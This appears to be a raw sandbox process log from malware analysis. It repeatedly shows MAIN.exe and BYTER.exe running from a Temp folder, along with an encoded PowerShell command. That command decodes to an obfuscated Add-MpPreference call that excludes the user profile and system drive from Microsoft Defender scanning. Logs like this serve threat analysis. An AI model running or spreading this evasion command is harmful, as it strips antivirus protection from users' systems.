"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="
C:\Users\Admin\AppData\Local\Temp\BYTER.exe
"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"
C:\Users\Admin\AppData\Local\Temp\MAIN.exe
"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="
C:\Users\Admin\AppData\Local\Temp\BYTER.exe
"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"
C:\Users\Admin\AppData\Local\Temp\MAIN.exe
"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="
C:\Users\Admin\AppData\Local\Temp\BYTER.exe
"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"
C:\Users\Admin\AppData\Local\Temp\MAIN.exe
"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="
C:\Users\Admin\AppData\Local\Temp\BYTER.exe
"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"
C:\Users\Admin\AppData\Local\Temp\MAIN.exe
"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="
C:\Users\Admin\AppData\Local\Temp\BYTER.exe
"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"
C:\Users\Admin\AppData\Local\Temp\MAIN.exe
"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="
C:\Users\Admin\AppData\Local\Temp\BYTER.exe
"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"
C:\Users\Admin\AppData\Local\Temp\MAIN.exe
"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="
C:\Users\Admin\AppData\Local\Temp\BYTER.exe
"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"
C:\Users\Admin\AppData\Local\Temp\MAIN.exe
"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="
C:\Users\Admin\AppData\Local\Temp\BYTER.exe
"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"
C:\Users\Admin\AppData\Local\Temp\MAIN.exe
"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="
C:\Users\Admin\AppData\Local\Temp\BYTER.exe
"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"
C:\Users\Admin\AppData\Local\Temp\MAIN.exe
"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="
C:\Users\Admin\AppData\Local\Temp\BYTER.exe
"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"
C:\Users\Admin\AppData\Local\Temp\MAIN.exe
"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="
C:\Users\Admin\AppData\Local\Temp\BYTER.exe
"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"
C:\Users\Admin\AppData\Local\Temp\MAIN.exe
"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="
C:\Users\Admin\AppData\Local\Temp\BYTER.exe
"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"
C:\Users\Admin\AppData\Local\Temp\MAIN.exe
"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="
C:\Users\Admin\AppData\Local\Temp\BYTER.exe
"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"
C:\Users\Admin\AppData\Local\Temp\MAIN.exe
"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="
C:\Users\Admin\AppData\Local\Temp\BYTER.exe
"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"
C:\Users\Admin\AppData\Local\Temp\MAIN.exe
"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="
C:\Users\Admin\AppData\Local\Temp\BYTER.exe
"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"
C:\Users\Admin\AppData\Local\Temp\MAIN.exe
"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="
C:\Users\Admin\AppData\Local\Temp\BYTER.exe
"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"
C:\Users\Admin\AppData\Local\Temp\MAIN.exe
"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="
C:\Users\Admin\AppData\Local\Temp\BYTER.exe
"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"
C:\Users\Admin\AppData\Local\Temp\MAIN.exe
"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="
C:\Users\Admin\AppData\Local\Temp\BYTER.exe
"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"
C:\Users\Admin\AppData\Local\Temp\MAIN.exe
"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="
C:\Users\Admin\AppData\Local\Temp\BYTER.exe
"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"
C:\Users\Admin\AppData\Local\Temp\MAIN.exe
"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="
C:\Users\Admin\AppData\Local\Temp\BYTER.exe
"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"
C:\Users\Admin\AppData\Local\Temp\MAIN.exe
"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="
C:\Users\Admin\AppData\Local\Temp\BYTER.exe
"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"
C:\Users\Admin\AppData\Local\Temp\MAIN.exe
"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="
C:\Users\Admin\AppData\Local\Temp\BYTER.exe
"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"
C:\Users\Admin\AppData\Local\Temp\MAIN.exe
"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="
C:\Users\Admin\AppData\Local\Temp\BYTER.exe
"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"
C:\Users\Admin\AppData\Local\Temp\MAIN.exe
"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="
C:\Users\Admin\AppData\Local\Temp\BYTER.exe
"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"
C:\Users\Admin\AppData\Local\Temp\MAIN.exe
"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="
C:\Users\Admin\AppData\Local\Temp\BYTER.exe
"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"
C:\Users\Admin\AppData\Local\Temp\MAIN.exe
"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="
C:\Users\Admin\AppData\Local\Temp\BYTER.exe
"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"
C:\Users\Admin\AppData\Local\Temp\MAIN.exe
"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="
C:\Users\Admin\AppData\Local\Temp\BYTER.exe
"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"
C:\Users\Admin\AppData\Local\Temp\MAIN.exe
"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="
C:\Users\Admin\AppData\Local\Temp\BYTER.exe
"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"
C:\Users\Admin\AppData\Local\Temp\MAIN.exe
"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="
C:\Users\Admin\AppData\Local\Temp\BYTER.exe
"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"
C:\Users\Admin\AppData\Local\Temp\MAIN.exe
"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="
C:\Users\Admin\AppData\Local\Temp\BYTER.exe
"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"
C:\Users\Admin\AppData\Local\Temp\MAIN.exe
"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="
C:\Users\Admin\AppData\Local\Temp\BYTER.exe
"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"
C:\Users\Admin\AppData\Local\Temp\MAIN.exe
"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="
C:\Users\Admin\AppData\Local\Temp\BYTER.exe
"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"
C:\Users\Admin\AppData\Local\Temp\MAIN.exe
